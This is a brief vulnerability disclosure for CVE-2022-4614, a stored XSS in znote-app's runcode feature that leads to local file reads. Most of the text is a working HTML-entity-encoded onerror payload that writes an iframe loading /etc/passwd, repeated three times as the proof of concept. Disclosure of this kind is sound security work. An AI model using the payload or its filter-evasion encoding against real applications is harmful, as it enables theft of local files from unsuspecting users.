CVE-2022-4614: XSS to LFI in Runcode Feature in znote-app

Description

By default runcode santized document prefix but if html encode to &#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041 then we can inserted html encoded func to html tag event like onerror <img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

POC: https://drive.google.com/file/d/1_Jh133kMAqMf8AUWrrjbOqRQpHSKlVyO/view?usp=sharing https://drive.google.com/file/d/1ek5dg4PG3rADuUPPXUOlKE6qSVGmKdZB/view?usp=sharing

Proof of Concept

<img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

Github issue: https://github.com/alagrede/znote-app/issues/73

Impact

Read Local OS File With Stored XSS